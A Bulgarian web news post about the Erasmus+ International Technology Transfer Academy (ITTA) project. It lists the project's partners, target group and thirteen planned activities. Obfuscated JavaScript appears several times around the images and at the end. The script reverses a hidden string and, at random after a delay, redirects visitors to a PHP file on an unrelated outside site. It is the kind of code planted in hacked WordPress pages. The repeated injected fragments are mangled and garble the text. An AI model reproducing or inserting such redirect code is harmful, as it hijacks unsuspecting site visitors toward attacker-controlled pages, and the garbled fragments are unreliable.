Нови идеи, нови партньорства

March 22, 2018 in ОТТ Новини

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2018/03/ITTA-LOGO.png">ITTA LOGO$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2018/03/ITTA-LOGO-300x300.png" width="300" height="300" />ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО), в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.

Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора ТТ и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта или са настоящи служители на TTO. Участниците ще преминат през модулите за обучение на национално равнище и ще използват платформата за дистанционно обучение. Всеки преминал през обученията на национално ниво, ще има възможност да се включи и в поне един от международните обучителни дейности.

Продължителност на проекта: 36 месеца

 Основните цели на проекта са:

-Разработване на учебна програма за професионално обучение на потенциални служители на ТТО с цел развитие на знания, умения и ценности;

- Разработване на методология за дистанционно обучение и програми за обучение „лице в лице“;

-Подпомагане участниците да бъдат наети в партньорски или други организации; проследяване и подпомагане на развитието им.

Основните дейности па проекта:

1. Транснационални срещи: На срещите ще се събират представители на всички партньори, отговорни по проекта на  всеки 6 месеца.

2. Оценка на потребностите и определяне на професията: Един от най- важните етапи на проекта, тъй като резултатите от оценката на потребностите ще бъдат основа за изготвяне на учебните програми.

3. Избор на участниците: Всеки партньор има ангажимент да избере 15-20 участника за проекта.

4. Съдържание и разработване на програми за обучителни събития: Партньорите ще разработят методологията за обучителните дейности както на национално, така и на международно ниво.

5. Национални обучителни дейности: Всеки модул от общо 5 ще обхваща период около 4-5 месеца, състоящ се от обучителни мероприятия, подкрепени от онлайн учебни модули, и практически стажове  по темите.

6. Международни обучителни дейности: Всеки партньор има ангажимент да бъде домакин. Ще има 6 събития, които ще се базират на оценката на постигнатото и развитието на компетентностите.

7. Онлайн / дистанционно обучение: Учебният процес на участниците ще бъде подкрепен и подобрен чрез онлайн модули за обучение (общо 12 модула), успоредно с другите обучителни дейности.

8. Практическо изпълнение/стаж: партньорите в сектора ще осигурят стажове, където участниците  ще могат да приложат това, което са научили по време на проекта.

9. М & Е: Един от основните елементи на този проект, тъй като разработването на нова методология за обучение, може да бъде ефективена единствено със силен механизъм за M & E, подкрепен със съответната документация.

10. Разработване на учебни програми за ПОО: Резултатите от всички дейности по проекта ще бъдат обобщени и структурирани като новите учебни програми за ПОО, които ще се използват в сектора.

11. Разработване и признаване на политики: Паралелно с дейностите по проекта, партньорите се очаква да работят и да лобират за признаването на новата учебна програма и подхода за ТТ сектора, тъй като проектът има за цел да проектира, развива, тества и оптимизира нови учебни програми.

12. Събития за популяризиране/Мултиплициращи събития: Всички партньори ще организират местни събития, за да  популяризират резултатите от проекта в своите държави.

13. Разработка на софтуер: ще бъде разработен под надзора на всички партньори. $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2018/03/еразмус.jpg">еразмус$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2018/03/еразмус-300x61.jpg" width="300" height="61" />